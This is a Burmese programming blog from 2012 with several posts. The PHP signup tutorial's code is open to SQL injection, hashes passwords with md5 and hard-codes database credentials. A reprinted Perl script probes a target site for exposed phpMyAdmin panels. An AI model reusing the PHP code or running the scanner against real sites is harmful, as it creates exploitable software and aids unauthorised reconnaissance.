Step1 =>ပထမဆံုး "temp_members_db" နဲ႔ "registered_members" ဆိုတဲ႔ table နွစ္ခုကို database အသစ္တစ္ခုထဲ႔မွာထပ္ေဆာက္လိုက္မယ္
            temp_members_db ထဲမွာေတာ႔
            comfirm_code -> varchar(65)
            name            -> varchar(65)
            email             -> varchar(65)
            password        -> varchar(65)
            county           -> varchar(65)

            ဆိုျပီး Columns 5 ခုေဆာက္လိုက္ပါ manual နဲ႔ မလုပ္ခ်င္ဘူးဆိုလည္းေအာက္က code ကို sql ထဲကို ကူးထည္႔လိုက္ပါ
           
CREATE TABLE `temp_members_db` (
`confirm_code` varchar(65) NOT NULL default '',
`name` varchar(65) NOT NULL default '',
`email` varchar(65) NOT NULL default '',
`password` varchar(15) NOT NULL default '',
`country` varchar(65) NOT NULL default ''
) ENGINE=MyISAM DEFAULT CHARSET=latin1;


ျပီးေတာ႔ "registered_members ထဲမွာေတာ႔
            id             => int(4)     primary_key
            name        => varchar(65)
            email         => varchar(65)
            password   => varchar(65)
            country      => varchar(65)

            ဆိုျပီး columns 5 ခုထပ္ေဆာက္ေပးရပါမယ္ manual နဲ႔ မလုပ္ခ်င္ဘူးဆိုလည္းေအာက္က code ကို sql ထဲကို ကူးထည္႔လိုက္ပါ
           
CREATE TABLE `registered_members` (
`id` int(4) NOT NULL auto_increment,
`name` varchar(65) NOT NULL default '',
`email` varchar(65) NOT NULL default '',
`password` varchar(65) NOT NULL default '',
`country` varchar(65) NOT NULL default '',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;


ပထမအဆင္႔ေတာ႔ ျပီးသြားပါျပီ
Step2 => signup.php ဆိုတဲ႔ဖိုင္ကို  form ပံုစံနဲ႔ျဖစ္ေအာင္ ေရးေပးရပါမယ္

http://www.cyberoot.net46.net/verify_email/signup.php
 Source Code for signup.php

 _________________________________________________________________
 <table width="350" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><form name="form1" method="post" action="signup_ac.php">
       <table width="100%" border="0" cellspacing="4" cellpadding="0">
              
            <tr>
                <td colspan="3"><center><strong>Sign Up </strong></center></td>
            </tr>
            <tr>
                <td width="76">Name</td>
                <td width="3">:</td>
                <td width="305"><input name="name" type="text" id="name" size="30"></td>
            </tr>
            <tr>
                <td>Email</td>
                <td>:</td>
                <td><input type="text" name="email" id="email" size="30"></td>
            </tr>
            <tr>
                <td>Password</td>
                <td>:</td>
                <td><input type="password" name="password" id="password" size="30"></td>
            </tr>
            <tr>
                <td>Country</td>
                <td>:</td>
                <td><input type="text" name="country"  id="country" size="30"></td>
            </tr>
            <tr>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td><input type="submit" name="Submit" value="Register">&nbsp;<input type="reset" name="Reset" value="Reset"></td>
            </tr>
                          
        </table>

_____________________________________________________________

Step3 =>signup_ac.php ဖိုင္ကိုထပ္ေရးပါမယ္ သူကေတာ႔ data ေတြကို database ထဲ႔ထည္႔ဖို႔အတြက္ေရးတာပါ
            အဲဒီအဆင္႔မွာ
            1=>random confirmation code ကိုဖန္တီးရမယ္
            2=>confirmation code data ကို database ထဲ႔ထည္႔ရမယ္
            3=>confirmation link ကို user ဆီ email ပို႔ေပးရပါမယ္
            Source code ေလးတစ္ခ်က္ေရးရေအာင္
+++++++++++++++++++++++++++++++++++++++++++
<?php
include('config.php');


$confirm_code = md5(uniqid(rand()));
$name=$_POST['name'];
$email=$_POST['email'];
$password=md5($_POST['password']);
$country=$_POST['country'];

//insert data into database
$sql="INSERT INTO temp_members_db(confirm_code,name,email,password,country)VALUES
('$confirm_code','$name','$email','$password','$country')";
$result=mysql_query($sql);

//if success insertd data into database ,send confirmation link to email
if($result){
   
    $to=$email;
    $subject = "Your confirmation link here";
    $header="From:Cyberoot<cyberoot1@gmail.com>";
    $message="Your Comfirmation Link \r\n";
    $message.="Click on this link to active your account \r \n";
    $message.="http://www.cyberoot.net46.net/verify_email/confirmation.php?passkey=$confirm_code";
    $sendmail = mail($to,$subject,$message,$header);
}else
{
    echo "Not found your email in our database";
}
if($sendmail){
    echo "your Confirmation link Has Been Sent To Your Email Address.";
}else{
    echo "Cannot send Confirmation link to your e-mail address";
}
?>

  
+++++++++++++++++++++++++++++++++++++++++++++
Step4 => confirmation.php ဖိုင္ကိုထပ္ေရးမယ္ ဒီအဆင္႔မွာေတာ႔  User က Signup လုပ္ျပီး ကၽြန္ေတာ္တို႔ပို႔လိုက္တဲ႔ confirmation link ကိုေမးထဲ႔မွာေတြ႔ရမွာပါ
             ပို႔လိုက္တဲ႔ confirmation link မွာ confirmation.php ဆိုတာပါတယ္ျပီးေတာ႔ passkey လည္းထည္႔ထားေသးတယ္ေလ
             1. ->passkey ကိုတစ္ခ်က္စစ္ေပးရပါမယ္
             2. ->တစ္ကယ္လို႔ passkey က database ထဲ႔မွာရွိတယ္ဆိုရင္ေတာ႔ temp_members_db ဆိုတဲ႔ table ထဲကေနျပီးေတာ႔ registered_members ဆိုတဲ႔ table ထဲကိုအားလံုးေျပာင္းေပးရမွာပါ
             3. -> temp_members_db ထဲမွာရွိတဲ႔ passkey ကို delete လုပ္ေပးရပါမယ္

+++++++++++++++++++++++++++++++++++++++++++
<?php
include('config.php');
$passkey=$_GET['passkey'];


$sql1="SELECT * FROM temp_members_db WHERE confirm_code='$passkey'";
$result1=mysql_query($sql1);
if($result1){
    $count=mysql_num_rows($result1);
    if($count==1){
        $rows=mysql_fetch_array($result1);
        $name=$rows['name'];
        $email=$rows['email'];
        $password=$rows['password'];
        $country=$rows['country'];
       
       
        $sql2="INSERT INTO registered_members(name,email,password,country)VALUES
        ('$name','$email','$password','$country')";
        $result2=mysql_query($sql2);
    }else{
        echo "Wrong Confirmation Code";
    }
   
    if($result2){
        echo "Your account has been actived";
        $sql3="DELETE FROM  temp_members_db WHERE confirm_code='$passkey'";
        $result3=mysql_query($sql3);
    }
}
?>

++++++++++++++++++++++++++++++++++++++++++++++

Step5 => config.php ကၽြန္ေတာ္တို႔သံုးမယ္႔ Database နဲ႔ခ်ိတ္ေပးရမယ္႔အပိုင္းပဲ႔ျဖစ္ပါတယ္


+++++++++++++++++++++++++++++++++++++++++++++++
<?php

$host="mysql2.000webhost.com";
$username="a6357811_cyber";
$password="Cyberoot1";
$db_name="a6357811_email";


//Connect to server and select database.
$connection = mysql_connect("$host", "$username", "$password")or die("cannot connect to server");
$database   = mysql_select_db($db_name)or die("cannot select DB");
mysql_query($database,$connection);

?>

++++++++++++++++++++++++++++++++++++++++++++++++

Thanks for Reading..
Written by cyberoot
www.cyberoot.blogspot.com
Ref:easyphpsetp    

JavaScript Essential Tranning Part 7


Arrays မ်ားအားဖန္တီးေရးသားျခင္း

ဒါက variable တစ္ခုတည္းကိုေရးျပထားတာပါ
var singleValue;
singleValue = 99 ;
                                        singleValue
                                  -------------------------
 Single Value = 99 ; => |       99               |
                                  -------------------------
                       
Variables အမ်ားၾကီးဆိုရင္ေတာ႔ Array ပံုစံနဲ႔ေအာက္ကလိုမ်ိဳးသံုးနိုင္ပါတယ္
var multipleValues = [] ;

                          multipleValues
              ----------------------------------------------------
            |   [0]                 50                           | => mulitpleValue[0] = 50;
              _________________________________
            |   [1]                 60                           | => multipleValue[1] = 60;
              _________________________________
            |   [2]                Mouse                       | => multipleValue[2] ="Mouse";
              _________________________________
             
သတိျပဳရမွာက index က 0 ကေနတာစတာပါပဲ႔ zero base index ေပါ႔ဗ်ာ
ကၽြန္ေတာ္က Mouse ကို Output ထုတ္ခ်င္တယ္ဆိုရင္ေတာ႔ ဒီလိုေရးမွာပါ
Console.log(multipleValue[2]);
အေပၚကေရးခဲ႔တာကိုရွင္းေအာင္ျပန္ေရးၾကည္႔မယ္

var multipleValues = [] ;
multipleValue[0] = 50 ;
multipleValue[1] = 60 ;
multipleValue[2] = "Mouse";


ဒါကရွင္းေအာင္ေရးေပမယ္႔ စာေၾကာင္းနည္းနည္းမ်ားေနတယ္ တိုေအာင္ထပ္ေရးၾကည္႔မယ္

var multipleValues= [ 50 , 60 , "Mouse" ] ;
                            [0] ,[1] ,  [2]       => index က 0 ကေနစတာေနာ္
                           
Array ပံုစံအမ်ိဳးမ်ိဳးရွိပါတယ္ ေလ႔လာၾကည္႔ရေအာင္

var multipleValues = [] ;                    // ကၽြန္ေတာ္အၾကိဳက္ဆံုးေရးနည္းပါ
var multipleValues = new Array();        // Array ဆိုတာ object ပါ
var multipleValues = Array() ;
var multipleValues = Array(5) ;


ေနာက္ျပီး Array ရဲ႕ properties အေၾကာင္း

var multipleValues = [ 10 , 20 , 30 , 40 , 50 ];

ကၽြန္ေတာ္က array ထဲမွာ length ဘယ္နွစ္ခုရွိလဲသိခ်င္တယ္ ဒီေတာ႔ ဒီလိုေရးမယ္

Console.log(multipleValues.length);

အေျဖကေတာ႔ length အေနထားအရ 5 ခုထြက္မွာပါ အျမင္႔ဆံုး index က 0 ကစတယ္ဆိုေတာ႔ 4 ျဖစ္သြားမွာပါ

Properties ရွိရင္ Method လည္းရွိမွာေပါ႔ 

Array Method

someFunction(params);          //function ကိုေခၚဖို႔အတြက္အသံုးျပဳပါတယ္

object ထဲမွာရွိတဲ႔ function ကို method လို႔ေခၚပါတယ္
someObject.someMethod();          //method ကိုေခၚဖို႔အတြက္ပါ

var multipleValues = [ 10 , 20 , 30 , 40 , 50 ] ;
var reversedValues = multipleValues.reverse();
var reversedValues = multipleValues.join();
var reversedValues = multipleValues.sort();


လိုခ်င္တဲ႔ method ကိုအဆင္ေျပသလိုေျပာင္းသံုးနိုင္ပါတယ္
console.log(reversedValues.join());
javascript ထဲမွာ array က ဘယ္ေနရာမွာမဆိုရွိနိုင္ပါတယ္
ဥပမာ anchor link လိုမ်ိဳးေပါ႔ webpage တစ္ခုမွာ link ေတြအမ်ားၾကီးရွိပါတယ္

var myArrayOfLinks = document.getElementsByTagName("a");

                                        myArrayOfLinks
                                      _______________________
                                    | [0] <a href="somePage..   |
                                      -------------------------------------
                                    | [1] <a href="otherPage..   |
                                      -------------------------------------
                                    | [2] <a href="http://www..  |
                                      -------------------------------------
                                    | [3] <a href="#.. "            |
                                      ______________________
အဆင္ေျပၾကပါေစ
Written by cyberoot
www.cyberoot.blogspot.com
Member of MHU Team



Tuesday, November 6, 2012

PhpMyAdmin finder { perl script }

#!/usr/bin/perl #*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* # # //////////////////////////////////// # Yakamoz PHPmyadmin Finder v.x.x # //////////////////////////////////// # # Title : PHPmyadmin Finder # Author: !-Bb0yH4cK3r_Dz-! # From : Azarbycan # Category : Remote # Emails : !-Bb0yH4cK3r_Dz-!@Yahoo.com , !-Bb0yH4cK3r_Dz-!@Hotmail.com , !-Bb0yH4cK3r_Dz-!@Gmail.com # #*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* use HTTP::Request; use LWP::UserAgent; system ("cls"); system ("title !-Bb0yH4cK3r_Dz-! (Yakamoz)..."); print "\t\t/////////////////////////////////////////////////\n"; print "\t\t_________________________________________________\n"; print "\t\t\t PHPmyadmin Finder v.x.x\n"; print "\t\t\t Coded By !-Bb0yH4cK3r_Dz-!\n"; print "\t\t\t Made In Azarbycan\n"; print "\t\t\t Version In English\n"; print "\t\t_________________________________________________\n"; print "\n\n"; sleep (1); print "\n\n"; print "\t HOST=> (ex: http://www.site.com)\n"; print "\t HOST=> :"; $host=; chomp($host); if($host !~ /http:\/\//) { $host = "http://$host"; }; print "\n\n"; print "\t\t*-*-*-*-*-* Scanning *-*-*-*-*-*\n"; print "\n\n"; @p = ("/phpMyAdmin/", "/phpmyadmin/", "/PMA/", "/admin/", "/dbadmin/", "/mysql/", "/myadmin/", "/phpmyadmin2/", "/phpMyAdmin2/", "/phpMyAdmin-2/", "/php-my-admin/", "/phpMyAdmin-2.2.3/", "/phpMyAdmin-2.2.6/", "/phpMyAdmin-2.5.1/", "/phpMyAdmin-2.5.4/", "/phpMyAdmin-2.5.5-rc1/", "/phpMyAdmin-2.5.5-rc2/", "/phpMyAdmin-2.5.5/", "/phpMyAdmin-2.5.5-pl1/", "/phpMyAdmin-2.5.6-rc1/", "/phpMyAdmin-2.5.6-rc2/", "/phpMyAdmin-2.5.6/", "/phpMyAdmin-2.5.7/", "/phpMyAdmin-2.5.7-pl1/", "/phpMyAdmin-2.6.0-alpha/", "/phpMyAdmin-2.6.0-alpha2/", "/phpMyAdmin-2.6.0-beta1/", "/phpMyAdmin-2.6.0-beta2/", "/phpMyAdmin-2.6.0-rc1/", "/phpMyAdmin-2.6.0-rc2/", "/phpMyAdmin-2.6.0-rc3/", "/phpMyAdmin-2.6.0/", "/phpMyAdmin-2.6.0-pl1/", "/phpMyAdmin-2.6.0-pl2/", "/phpMyAdmin-2.6.0-pl3/", "/phpMyAdmin-2.6.1-rc1/", "/phpMyAdmin-2.6.1-rc2/", "/phpMyAdmin-2.6.1/", "/phpMyAdmin-2.6.1-pl1/", "/phpMyAdmin-2.6.1-pl2/", "/phpMyAdmin-2.6.1-pl3/", "/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.2-beta1/", "/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.2/", "/phpMyAdmin-2.6.2-pl1/", "/phpMyAdmin-2.6.3/", "/phpMyAdmin-2.6.3-rc1/", "/phpMyAdmin-2.6.3/", "/phpMyAdmin-2.6.3-pl1/", "/phpMyAdmin-2.6.4-rc1/", "/phpMyAdmin-2.6.4-pl1/", "/phpMyAdmin-2.6.4-pl2/", "/phpMyAdmin-2.6.4-pl3/", "/phpMyAdmin-2.6.4-pl4/", "/phpMyAdmin-2.6.4/", "/phpMyAdmin-2.7.0-beta1/", "/phpMyAdmin-2.7.0-rc1/", "/phpMyAdmin-2.7.0-pl1/", "/phpMyAdmin-2.7.0-pl2/", "/phpMyAdmin-2.7.0/", "/phpMyAdmin-2.8.0-beta1/", "/phpMyAdmin-2.8.0-rc1/", "/phpMyAdmin-2.8.0-rc2/", "/phpMyAdmin-2.8.0/", "/phpMyAdmin-2.8.0.1/", "/phpMyAdmin-2.8.0.2/", "/phpMyAdmin-2.8.0.3/", "/phpMyAdmin-2.8.0.4/", "/phpMyAdmin-2.8.1-rc1/", "/phpMyAdmin-2.8.1/", "/phpMyAdmin-2.8.2/", "/sqlmanager/", "/mysqlmanager/", "/p/m/a/", "/PMA2005/", "/pma2005/", "/phpmanager/", "/php-myadmin/", "/phpmy-admin/", "/webadmin/", "/sqlweb/", "/websql/", "/webdb/", "/mysqladmin/", "/mysql-admin/"); foreach $myadmin(@p){ $url = $host.$myadmin; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success){print "Found : $url\n";} if ($response->content=~ /Access Denied/){print "Found : $url =>[Error & Access Denied]\n";} else {print "NotFound : $myadmin\n";} }

AJAX မိတ္ဆက္

Ajax ဆိုတာဘာလဲ?

လူေတြေျပာၾကတာကေတာ႔ Asynchronous JavaScript and XML ဆိုပဲ႔ ဆိုလိုတာက Javascript နဲ႔ XML ကို asynchronous လုပ္ထားတာပါ
Asynchronous ဆိုတာကေကာ ဘာလဲ အရင္ကကၽြန္ေတာ္လည္းမသိပါဘူး ကၽြန္ေတာ္သိတာကေတာ႔

Synchronous = ဥပမာ ကၽြန္ေတာ္ကသင္႔ကို တာတာလိုလက္ျပျပီးနုတ္ဆက္တယ္ဗ်ာ ကၽြန္ေတာ္လက္ျပတာျမင္က ခင္ဗ်ားကလည္း တာတာလို႔ျပန္ျပတယ္
 တစ္ခုျပီးမွတစ္ခုေပါ႔ ။ကၽြန္ေတာ္လက္ျပတာျမင္ျပီးမွ သင္႔က လက္ျပန္ျပတာပါ ျပီးေတာ႔ ဖုန္းေျပာတာကမ်ိဳးလည္း Synchronous လုပ္တာပါ
 ကၽြန္ေတာ္တို႔က Hello လို႔အရင္ေျပာတယ္ ကၽြန္ေတာ္ေျပာတာကိုနားေထာင္ျပီးမွ ဟိုဘက္ကလည္း Hello လို႔ျပန္ေျပာတယ္ေလ ဟုတ္

 Asynchronous= သူကေတာ႔ ကၽြန္ေတာ္တို႔ ဖုန္းေျပာသလိုမ်ိဳးပါပဲ႔ အေပၚမွာေျပာခဲ႔တဲ႔ပံုစံနဲ႔ဖုန္းေျပာတာမ်ိဳးေတာ႔မဟုတ္ဘူး ဖုန္းထဲမွာရန္ျဖစ္ေနတဲ႔ပံုစံနဲ႔တူပါတယ္
 တစ္ဘက္ကေျပာတာျပီးေအာင္မေစာင္႔ဘူးဗ်ာ သူေျပာခ်င္တာကိုေျပာတာ ဒီဘက္ကလည္းဟိုဘက္ကေျပာတာ ျပီးတာမျပီးတာနားမလည္ဘူးသူလည္းစိတ္ထဲ႔ကရွိတာေျပာတယ္
 icon နဲ႔ဖုနး္ေျပာေနတာလည္း asynchronous လုပ္တာပါပဲ႔ ရဲေတြေျပာတာေတြ႔ဖူးလား ေျပာခ်င္တဲ႔လူကျပာ က်န္တဲလူေတြကၾကားေနရတယ္ ေျပာခ်င္တဲ႔လူကၾကားထဲကေန၀င္ေျပာတယ္
 အဲဒါဆို Asynchronous ေပါ႔

 Ajax ဆိုတာက အေပၚကေျပာခဲ႔သလိုပါ႔ပဲ႔ ကၽြန္ေတာ္တို႔ program အလုပ္လုပ္ေနတဲ႔အခ်ိန္မွာ ေနာက္ကြယ္ကေန Javascript နဲ႔ xml ဖိုင္ကို
 Asynchronous လုပ္ေပးတာေပါ႔ အဆင္ေျပမယ္လို႔ထင္ပါတယ္
 ျပီးေတာ႔ အခ်ိဳ႕လူေတြက Ajax ဆိုတာ programming language အသစ္လို႔ထင္ၾကတယ္ တစ္ကယ္ေတာ႔ လက္ရွိရွိျပီးသားျဖစ္တဲ႔ language ကို
 modified လုပ္ထားတဲ႔ Technology တစ္ခုပဲ႔ျဖစ္ပါတယ္
 ဘာေတြလုပ္နိုင္လဲဆိုရင္ေတာ႔ Server က Data ေတြကိုေျပာင္းလဲလို႔ရတယ္ ျပီးေတာ႔ webpage တစ္ခုလံုးကို reloading လုပ္စရာမလိုပဲ႔ လိုအပ္တဲ႔ အပိုင္းေတြေလာက္ပဲ႔
 ျမန္ျမန္ဆန္ဆန္ Update လုပ္ေပးနိုင္တယ္
 ဥပမာ Fackbook လိုမ်ိဳးဟာက ေနာက္တက္လာမယ္႔ post or comment ေတြကိုေနာက္ကြယ္ကေန ajax သံုးျပီး Loading လုပ္ေပးပါတယ္

Ajax နမူနာပံုစံ
 <html>
<head>
<script type="text/javascript">
function loadXMLDoc()
{
if (window.XMLHttpRequest)
  {// code for IE7+, Firefox, Chrome, Opera, Safari
  xmlhttp=new XMLHttpRequest();
  }
else
  {// code for IE6, IE5
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.onreadystatechange=function()
  {
  if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
    document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
    }
  }
xmlhttp.open("GET","ajax_info.txt",true);
xmlhttp.send();
}
</script>
</head>
<body>

<div id="myDiv"><h2>Let AJAX change this text</h2></div>
<button type="button" onclick="loadXMLDoc()">Change Content</button>

</body>
</html>

ဒါကနမူနာပါ နည္းနည္းေတာ႔ရွုပ္ေနလိမ္႔မယ္ ေနာက္ပိုင္းမွာနားလည္သြားမွာပါ Don't worry my Friends , Life is fighting
Ajax ကိုစေလ႔လာေတာ႔မယ္ဆိုရင္ Html , Css , Javascript / DOM ကိုသိဖိုေတာ႔လိုပါတယ္

Dynamic web site ေတြကိုပိုမိုျမန္ဆန္ေစဖို႔အတြက္ Ajax နည္းပညာကိုအသံုးျပဳၾကပါတယ္
Server ေနာက္ကြယ္ကေနျပီးေတာ႔ လိုအပ္တဲ႔ data ေတြကို ေျပာင္းလဲဖို႔အတြက္ ajax ကလုပ္ေဆာင္ေပးနိုင္ပါတယ္
ဆိုလိုတာက အေပၚမွာေျပာသလိုပဲ႔ web page တစ္ခုလံုးကို loading လုပ္စရာမလိုပဲ႔ လိုအပ္တာကိုပဲ႔ကြက္ျပီး အလြယ္တကူလုပ္ေဆာင္နိုင္ပါတယ္

Ajax နည္းပညာသံုးထားတဲ႔ နာမည္ၾကီး website ေတြကေတာ႔   Google Maps, Gmail, Youtube, and Facebook tabs.
ဒါဆို Ajax ဘယ္ေလာက္အေရးပါလဲဆိုတာ သေဘာေပါက္မယ္ထင္ပါတယ္
သူရဲအလုပ္လုပ္ပံုပါ


Ajax နည္းပညာကို internet Standards အေပၚမွာအေျခခံျပီးတည္ေဆာက္ထားတာပါ
Server က data ကို ေျပာင္းလဲဖို႔အတြက္ XMLHttpRequest ဆိုတဲ႔ object ကိုသံုးထားပါတယ္
information လုပ္ေဆာင္ခ်က္ေတြကိုျပေပးဖို႔အတြက္ Javascript / Dom ကိုသံုးထားပါတယ္
Data ရဲ႕ Design လုပ္ဖို႔အတြက္ Css ကိုအသံုးျပဳထားပါတယ္

Google က Ajax ကို 2005 ခုနွစ္ေလာက္မွာပိုျပီး Popular ျဖစ္လာေစခဲ႔တယ္
Google Search box ထဲမွာစာစရိုက္လိုက္တာနဲ႔ Javascript က ရိုက္လိုက္တဲ႔ စာကို server ကိုပို႔ေပးျပီးေတာ႔ server ကေန return ျပန္လာတဲ႔
list ကိုျပန္ျပေပးပါတယ္

အေပၚကနမူနာေရးထားတဲ႔ ajax ကိုနည္းနည္းေလာက္ရွင္းျပေပးခ်င္ပါတယ္
ေရးထားတဲ႔ Code ေအာက္နားေလးမွာ div section တစ္ခုနဲ႔ button တစ္ခုပါတယ္ဆိုတာသတိျပဳမိမွာပါ
ကၽြန္ေတာ္က div section ကိုေတာ႔ Server ကေနျပန္လာတဲ႔ information ကို return ျပန္ျပဖို႔အတြက္အသံုးျပဳထားပါတယ္
Button ကိုေတာ႔ loadXMLDoc() ဆိုတဲ႔ function ကိုေခၚဖို႔အတြက္အသံုးျပဳထားျခင္းျဖစ္ပါတယ္
အရင္ဆံုးအေပၚကလိုမေရးခင္ ရုိးရိုးေလး ေရးၾကည္မယ္
<html>
<body>
<div id="myDiv"><h2>Let AJAX change this text</h2></div>
<button type="button" onclick="loadXMLDoc()">Change Content</button>
</body>
</html>


ေနာက္ထပ္ script ကိုေတာ႔ html ရဲ႕ head section ထဲမွာေပါင္းျပီးေရးထည္႔ပါတယ္
script ထဲမွာေတာ႔  loadXMLDoc() function ကိုထည္႔ေရးထားပါတယ္  ဒီေတာ႔
<head>
<script type="text/javascript">
function loadXMLDoc()
{
.... AJAX script goes here ...
}
</script>
</head>


ဒီေန႔ေတာ႔ဒီေလာက္ပါပဲ႔ ေနာက္မွဆက္ရေအာင္ဗ်ာ
Written by cyberoot
(MHU Team)
http://cyberoot.blogspot.com(I miss my Home)
Ref:w3schools






Tuesday, October 9, 2012

ဘူေတြလာလဲဟ???

blog မေရးေတာ႔ဘူးလို႔လုပ္ထားတယ္ ဒါေပမယ္႔ သံေယာဇဥ္ကေတာ႔သိပ္မျပတ္ေသးဘူး
၀င္ၾကည္႔လိုက္ရင္ အျမဲတမ္းအျခားလူေတြလာၾကည္႔ေနတာ ေတြ႔ေနတယ္ ဟီး

ဒီေတာ႔ vote လုပ္မယ္ အားေပးတဲ႔တူ 10 ေယာက္ထက္ပိုရင္ ျပန္ေရးမယ္ ဒါပဲ႔ ဗ်ဲ
ဒီ post ေအာက္မွာ Comment ေပးျပီး vote လုပ္ရင္ေကာင္းမယ္ ဟီး
End date က 30.10.12 ထိ..  :)

5 vote

Voter 
sulatt                9.10.12
Min Soe Yar Sar 9.10.12
black road         10.10.12
k!Do,m0nStAar  20.10.12
zawnay9@gmail.com  Sat, Oct 20, 2012 at 1:43 PM (by email)